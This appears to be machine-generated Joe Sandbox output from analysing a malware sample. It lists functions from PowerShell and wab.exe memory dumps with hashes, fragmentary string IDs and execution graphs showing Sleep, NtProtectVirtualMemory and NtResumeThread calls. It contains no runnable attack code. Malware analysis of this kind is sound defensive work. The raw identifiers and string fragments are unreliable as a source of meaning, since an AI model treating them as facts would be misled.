                                                • Opcode Fuzzy Hash: 081253f0dc1f0c2b7897d34abce7f27b7595314b856fa7cb5d704d29729545f6
                                                • Instruction Fuzzy Hash: 5481C130700206DFDB24EF68C4517AEBBA2AB84351F24C46BE9169F3A5CB71DD51CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD9268 Relevance: 7.7, Strings: 6, Instructions: 229COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$`\h$`\h$h%h$h%h
                                                • API String ID: 0-1112478520
                                                • Opcode ID: b49f60c9486c258c1287e542ed391a62f6c9fd0ae2efc6acafa50f323a64f7c0
                                                • Instruction ID: fac49b7b618aeb583ba8307c50e1a80bec99d99520d84b821bc245998e787836
                                                • Opcode Fuzzy Hash: b49f60c9486c258c1287e542ed391a62f6c9fd0ae2efc6acafa50f323a64f7c0
                                                • Instruction Fuzzy Hash: 64712275B04340AFCB255B6984107AB7BB29FC9310F28847BD596CF382DA31CC46C392
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADEC25 Relevance: 7.7, Strings: 6, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XRp$XRp$XRp$tPp$tPp$$p
                                                • API String ID: 0-67365314
                                                • Opcode ID: 5ab7574883c753b6d6b08c74075bff06f47a8e082d0485ce33561abbc1949084
                                                • Instruction ID: 925855baa43abe3196a926b272358a1d5d8333ebd272a0162574f96a59425cc5
                                                • Opcode Fuzzy Hash: 5ab7574883c753b6d6b08c74075bff06f47a8e082d0485ce33561abbc1949084
                                                • Instruction Fuzzy Hash: 2461B135B00201AFDB58EF68C444AAEBBF2AB88310F28846AD5569F395CF75DD41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADF374 Relevance: 6.6, Strings: 5, Instructions: 338COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8#h$h%h$h%h$[h$[h
                                                • API String ID: 0-838792157
                                                • Opcode ID: 91631c527c3631f9d441f42a689eeae5a3cda218206effe27dab1a1228c3af25
                                                • Instruction ID: dc1cb0ad2e3e87b232e651f88b5cd18f5f81e64c6333b0ed9b0ac20e70d4ee9c
                                                • Opcode Fuzzy Hash: 91631c527c3631f9d441f42a689eeae5a3cda218206effe27dab1a1228c3af25
                                                • Instruction Fuzzy Hash: 77D11AB4A00205EFDB14DF58D541AAAB7B2BF88314F24C57AD817AB745C731ED82CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADE838 Relevance: 6.5, Strings: 5, Instructions: 230COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$tPp$$p$$p$$p
                                                • API String ID: 0-2968649028
                                                • Opcode ID: 04c8deaff4db74ffdd5db5e9465a9a61ec7ac075a4ca6ff5d3c8c39bf90e5794
                                                • Instruction ID: c6d56c8f67b5765fd8035fa2657897a0cfd51ce3828c9c8debfb24f9fbce122f
                                                • Opcode Fuzzy Hash: 04c8deaff4db74ffdd5db5e9465a9a61ec7ac075a4ca6ff5d3c8c39bf90e5794
                                                • Instruction Fuzzy Hash: AF81A131600206DFDB24EF14C5517AABBB1BB84351F28846BE9179F3A1CB71EC90DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADE82F Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$tPp$$p$$p$$p
                                                • API String ID: 0-2968649028
                                                • Opcode ID: 5bec92c9a931c21b395a13fed8e6c6c02c576f4c5ba522d7c134aad66ddaa0d0
                                                • Instruction ID: 54742fbf0c9ce3d6f7c809f50ba609d636975c4346d728c2888c41e03775b31d
                                                • Opcode Fuzzy Hash: 5bec92c9a931c21b395a13fed8e6c6c02c576f4c5ba522d7c134aad66ddaa0d0
                                                • Instruction Fuzzy Hash: 7B616E30601206DFDB24EF14C5557AAB7B1BB84752F68806BE8179F3A4CBB1ED80DB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD2658 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h%h$h%h$$p$$p$$p
                                                • API String ID: 0-972890748
                                                • Opcode ID: addb2875ccbc0efe9c5eb92004a938e86d1915c7b2fef08d03605e9f4413fb1c
                                                • Instruction ID: 9cdb65d6454b8bd073beacae88ae2c6efc52d58aa38fd4c6fa233e200a827b42
                                                • Opcode Fuzzy Hash: addb2875ccbc0efe9c5eb92004a938e86d1915c7b2fef08d03605e9f4413fb1c
                                                • Instruction Fuzzy Hash: DB512135B043019FCB259B69884076ABBF2AFE6310F28807BD846DB395DB71DC41C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD02E5 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L4p$L4p$L4p$L:{$L:{
                                                • API String ID: 0-1624532146
                                                • Opcode ID: 80b94949ccd99fefe2ca302657ea521dcc6e58ca3bfc8967abafbb67d49a586e
                                                • Instruction ID: f9ba28a7046535a6af49694837a10e5eb5bd0906f2c254ff5cf23e224c6c83a3
                                                • Opcode Fuzzy Hash: 80b94949ccd99fefe2ca302657ea521dcc6e58ca3bfc8967abafbb67d49a586e
                                                • Instruction Fuzzy Hash: 4B41CE75A00208EFDB258F64C454FAE7BB2AF84310F198067E9569F391C7B4DD85CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADDC85 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$$p$$p$$p
                                                • API String ID: 0-2334450948
                                                • Opcode ID: f09c2e6da4cff698fb1820350dbd7069d72c595efdf22b9bacb726df7851475e
                                                • Instruction ID: 438515e8687397b3b1892b82a46ae8501de65836b971f916f8bf814e2c14d997
                                                • Opcode Fuzzy Hash: f09c2e6da4cff698fb1820350dbd7069d72c595efdf22b9bacb726df7851475e
                                                • Instruction Fuzzy Hash: 91313536B052018FDF294F3994406BABBE2AFD6311B3880BBC4838A345DEB1CD41C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADA7DF Relevance: 6.4, Strings: 5, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$tPp$$p$$p$$p
                                                • API String ID: 0-2968649028
                                                • Opcode ID: fbdf53c945868cfe4a14049cd4e8028b3bb50d12aeca4face3ad7470f8cdd1c6
                                                • Instruction ID: 65bfd5481eed0d3ca3ac3392a3a03fa596e7d8d91b79fd5b3e62051e9abfa535
                                                • Opcode Fuzzy Hash: fbdf53c945868cfe4a14049cd4e8028b3bb50d12aeca4face3ad7470f8cdd1c6
                                                • Instruction Fuzzy Hash: 8E41D131A04204EFDB248F05C550BA9B7B1AFA4360F29C16BD8279B394CB71DD81DB97
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADFCCF Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp$$p$$p$$p$$p
                                                • API String ID: 0-336990704
                                                • Opcode ID: e3e3a178c16128918d19ca7abee9d64fd314ea7737b8e8a600d15e60bb90da1c
                                                • Instruction ID: 87fc0e5feaea04ebc732b98247d41d6c57bd536bb3d18bfd6ad46e8dd5ca6c15
                                                • Opcode Fuzzy Hash: e3e3a178c16128918d19ca7abee9d64fd314ea7737b8e8a600d15e60bb90da1c
                                                • Instruction Fuzzy Hash: C221B0366002159FCB248F64D940A7BBBB6AF85714B28407BEC939B361C771DD40CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADD318 Relevance: 5.5, Strings: 4, Instructions: 472COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (op$(op$(op$(op
                                                • API String ID: 0-4040569024
                                                • Opcode ID: d64c821f4b2e2b27a0f25ae0d7f9843a8bf6ec8dbcb58daa60b17dd360297812
                                                • Instruction ID: 046490443f433cc85de7bf0502f1afb7976cc7b2b613b42e38adb23e263d93e4
                                                • Opcode Fuzzy Hash: d64c821f4b2e2b27a0f25ae0d7f9843a8bf6ec8dbcb58daa60b17dd360297812
                                                • Instruction Fuzzy Hash: 17F12435B04344DFDB258F68D850BAABBB2AF85310F2884ABE416CB392DB71DC45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 046B21EA Relevance: 5.3, Strings: 4, Instructions: 324COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.537966584.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp$tPp$tPp$tPp
                                                • API String ID: 0-3662552368
                                                • Opcode ID: 20806939612a90d7de25245414197f7a996f2a55c07084b30a5ceb27a1876b41
                                                • Instruction ID: c485c02dcb072b784cdcb9aef3cb50264ea28c5be6648c02d1577bd2fc374e7e
                                                • Opcode Fuzzy Hash: 20806939612a90d7de25245414197f7a996f2a55c07084b30a5ceb27a1876b41
                                                • Instruction Fuzzy Hash: 93C1A735B00205DFCB25CF58C4646AEFBE2BB89310F5884A9E8559B351EB71EC82DBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 046B05E8 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.537966584.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp$tPp$tPp$tPp
                                                • API String ID: 0-3662552368
                                                • Opcode ID: 283fafd2efc4385d02be06e276acc351e53fd292ded3312573f76336a6ba4b69
                                                • Instruction ID: 47d52d6b7668652d335137baca81b0a2909a6d3224f00e35ad3e57dd2fc21dc2
                                                • Opcode Fuzzy Hash: 283fafd2efc4385d02be06e276acc351e53fd292ded3312573f76336a6ba4b69
                                                • Instruction Fuzzy Hash: B8919635B00214DFDB24DF58D540AAFBFE2ABC8310F248469D9959B355EA71EC82CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD9DA0 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h
                                                • API String ID: 0-758857168
                                                • Opcode ID: 2e03214138e3cea3c493995d5fda04030206559d045c9eca2d0bd4cd566b6d53
                                                • Instruction ID: d5feef641c5c881479534d7eb38fce54b5d1c63783c8d7d381eb5ad13fda3188
                                                • Opcode Fuzzy Hash: 2e03214138e3cea3c493995d5fda04030206559d045c9eca2d0bd4cd566b6d53
                                                • Instruction Fuzzy Hash: 2341C135B043508FCB18DB688444AABBBF2AFCA310B2884ABD556CB356DF31DC41C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD97F8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $p$$p$$p$$p
                                                • API String ID: 0-3121760203
                                                • Opcode ID: 2d9bebcbde15df2770a26214e987c1da92cca6aad51abf3d883c4ef3586b4150
                                                • Instruction ID: bb9a09db442f81987b1d2b0164654a82ee77961c39f1b10373edac43c7fcb55a
                                                • Opcode Fuzzy Hash: 2d9bebcbde15df2770a26214e987c1da92cca6aad51abf3d883c4ef3586b4150
                                                • Instruction Fuzzy Hash: 6E2127317043056BDB241A6E9840B6FBAEA9FC5B10F28843BD54BCB385DEB5CC41E361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD7D3C Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h
                                                • API String ID: 0-758857168
                                                • Opcode ID: d8722ba716ab65dc5b37f7d1c0037d4309c375be86a326f72819ac6aa1302d07
                                                • Instruction ID: 9a58675a84cd7409cba56117e63bff09c7b3254d7110dfd02c64c2662931e080
                                                • Opcode Fuzzy Hash: d8722ba716ab65dc5b37f7d1c0037d4309c375be86a326f72819ac6aa1302d07
                                                • Instruction Fuzzy Hash: D931F435B082118FCB1D4B2884116BEBBA39FD9711F2894BBC4938B354EE35CC81DB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 046B10A4 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.537966584.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h
                                                • API String ID: 0-758857168
                                                • Opcode ID: 0c552060bf9b0f1daddf9a65619771b7aa388d5d81382837d0cae78d44fe359b
                                                • Instruction ID: 56790d9778158bb2269e0733aa689570622f9672063042f43079ec497f6a8bf8
                                                • Opcode Fuzzy Hash: 0c552060bf9b0f1daddf9a65619771b7aa388d5d81382837d0cae78d44fe359b
                                                • Instruction Fuzzy Hash: 3A21E535B04251AFCB288A6884305E6FBE19BD7291F24446AC0C1CB356FE31E9D6C7E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00ADEEC4 Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h
                                                • API String ID: 0-758857168
                                                • Opcode ID: 210014f04d69d057ae4180cd32127f6aff10e9aaff7743b9debc86fc60ce655d
                                                • Instruction ID: df3f567864c1aa7cc52090a53ad56ffb2941badcfa517a3a19f6554d2b6695ca
                                                • Opcode Fuzzy Hash: 210014f04d69d057ae4180cd32127f6aff10e9aaff7743b9debc86fc60ce655d
                                                • Instruction Fuzzy Hash: 7C21C436B04241DBCB19EB6884116AABBA2ABD9311B3884BBC557CF345DF31CD92C752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 046B0D6C Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.537966584.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_46b0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$h%h$h%h
                                                • API String ID: 0-758857168
                                                • Opcode ID: 3a1d54761ecb43595fdde50c3cc12869ee4faee6952790d57a3e8dd0dcb0faa8
                                                • Instruction ID: 7081f72b1ec8d4b6cfed27605495288e23fb2e74a58fa9ddee909b6e31a1832c
                                                • Opcode Fuzzy Hash: 3a1d54761ecb43595fdde50c3cc12869ee4faee6952790d57a3e8dd0dcb0faa8
                                                • Instruction Fuzzy Hash: EC21F7357042419FCB294A6884206E7FFA19BE5311B2884BBC1D18B394FA71F9D2C3D2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AD06C0 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.530633289.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_ad0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$$p$$p
                                                • API String ID: 0-377911355
                                                • Opcode ID: 0929a0bf216c373f88c3c2984f1a00404cc8a2d8025c125dd1bfba3fb299c6eb
                                                • Instruction ID: 75f44d83e5cec18ced2d9756041c508d4bd773021f35183e533b3c11e6b42eb1
                                                • Opcode Fuzzy Hash: 0929a0bf216c373f88c3c2984f1a00404cc8a2d8025c125dd1bfba3fb299c6eb
                                                • Instruction Fuzzy Hash: ED018F2060A6D01FC32A023C6820B6AAFB65BC6210BA941EBE491DF397C9549C468792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:66.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:100%
                                                Total number of Nodes:4
                                                Total number of Limit Nodes:0
                                                execution_graph 11 3f2293a 12 3f2297b 11->12 12->11 13 3f2299e Sleep 12->13 14 3f22a09 NtProtectVirtualMemory 12->14 13->11 14->12

                                                Callgraph

                                                • Executed
                                                • Not Executed
                                                • Opacity -> Relevance
                                                • Disassembly available
                                                callgraph 0 Function_03F2293A 1 Function_03F221FC 0->1

                                                Executed Functions

                                                Function 03F2293A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51sleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.866961195.0000000003E9B000.00000040.00000400.00020000.00000000.sdmp, Offset: 03E9B000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_3e9b000_wab.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: 0^r
                                                • API String ID: 3472027048-1251071597
                                                • Opcode ID: d052bfb56ba8989cfceac4d160fb96647cd4ab194cc0543a31c4adfbef3a3be1
                                                • Instruction ID: 3b348af2643701b217fe3a882b414d6bbd6130e8555e7b693e554249b1054654
                                                • Opcode Fuzzy Hash: d052bfb56ba8989cfceac4d160fb96647cd4ab194cc0543a31c4adfbef3a3be1
                                                • Instruction Fuzzy Hash: C0117AB2904311EFE784CF31CC8CB66B760BF10394F4A819899154F0A6D378C480CF11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                Function 002DD01D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.565740783.00000000002DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002DD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2dd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92bfd3c3a4209c689da0c10fb2c6db6421fc33dacf59858c0a4bca306b8ae882
                                                • Instruction ID: 6213177a44ea2b7d3cfd0cb624d6e9a4229220d4182ebedc388ba8e0b3bd56b2
                                                • Opcode Fuzzy Hash: 92bfd3c3a4209c689da0c10fb2c6db6421fc33dacf59858c0a4bca306b8ae882
                                                • Instruction Fuzzy Hash: 0901A771418784ABE7205E15CC84B66BFD8EF81725F18851BEC454F386C6B9DC45CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002DD006 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.565740783.00000000002DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002DD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_2dd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4cf41eddc4a77def552ea4b79dbd9bef95b1383522ba0b5928c5b649f9e96e2
                                                • Instruction ID: 2b60562eaf920c06e0c1e688c2fc07c5724aaed1945c65bf3cb29ef83ee8f132
                                                • Opcode Fuzzy Hash: b4cf41eddc4a77def552ea4b79dbd9bef95b1383522ba0b5928c5b649f9e96e2
                                                • Instruction Fuzzy Hash: CF014C6244D7C09FD7128A258894B66BFA4EF53224F1981DBD8888F2A7C2699C48C772
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:6.5%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:4
                                                Total number of Limit Nodes:0
                                                execution_graph 21873 83f1e84 21874 83f1ed7 21873->21874 21875 83f1f11 NtResumeThread 21874->21875 21876 83f1f2a 21875->21876 21876->21876

                                                Executed Functions

                                                Function 083F1E84 Relevance: 1.5, APIs: 1, Instructions: 46nativethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 083F1000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_83f1000_powershell.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 0274ccdbdaa40eb1da515c79b132e92ac38775e99bf3d7d18fc2c2284e4f4c1e
                                                • Instruction ID: 6ad81b734c79357f7ecc42c52266abe9a641572f177bdf4bd12ce74107dbe113
                                                • Opcode Fuzzy Hash: 0274ccdbdaa40eb1da515c79b132e92ac38775e99bf3d7d18fc2c2284e4f4c1e
                                                • Instruction Fuzzy Hash: AA015A3570068ADECF399E7899986CD3361EFD9745F60813ACD49CB608E734D9858B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00383600 Relevance: 66.6, Strings: 52, Instructions: 1613COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p$8#h$8#h$8R!$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h$h%h$tPp$tPp$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$[h$[h$[h$[h$[h$[h
                                                • API String ID: 0-3367135899
                                                • Opcode ID: 99d22561a009aba9e156e59ee6bea2a3ba717b681c48fd48690c471d0abb4517
                                                • Instruction ID: a9d1a02fd5f92d0d007554ae071b2357eb69f389eb2d4e79886569ad11d7de9b
                                                • Opcode Fuzzy Hash: 99d22561a009aba9e156e59ee6bea2a3ba717b681c48fd48690c471d0abb4517
                                                • Instruction Fuzzy Hash: CBE27D74B00304DFDB15DB68C450B6ABBB2AF89304F25C0AAE955AF756CB71ED82CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003842C4 Relevance: 48.6, Strings: 38, Instructions: 1097COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$8#h$h%h$h%h$h%h$h%h$h%h$h%h$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$[h
                                                • API String ID: 0-2354238530
                                                • Opcode ID: 816a13d0143eda8c299f2a3653b29132fe72de6bb10662e45bc31897cd8f9fa5
                                                • Instruction ID: 540303e10e6e1ec97e2c65a49560c0fee3d482b9d5a3cbc3af9d9b88ddc29792
                                                • Opcode Fuzzy Hash: 816a13d0143eda8c299f2a3653b29132fe72de6bb10662e45bc31897cd8f9fa5
                                                • Instruction Fuzzy Hash: DEA24E78A00205DFDB65DB58C540F6ABBB2EF89304F25C0A9E954AF756CB71ED82CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003843CD Relevance: 29.2, Strings: 23, Instructions: 431COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)$;)
                                                • API String ID: 0-2341927469
                                                • Opcode ID: 039395624fb5748a7f02fa4088d9c3fbe894bd859097ea4b7ff4079d85daed26
                                                • Instruction ID: 89dd7971e776ef103505a82f016b43f052028715eba4ae160c3ef8679b168a31
                                                • Opcode Fuzzy Hash: 039395624fb5748a7f02fa4088d9c3fbe894bd859097ea4b7ff4079d85daed26
                                                • Instruction Fuzzy Hash: CE023E78B002049FDB64DB58C851F6ABBB2FB88304F258199E958AF756CB71ED81CF41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00387E48 Relevance: 15.6, Strings: 12, Instructions: 593COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
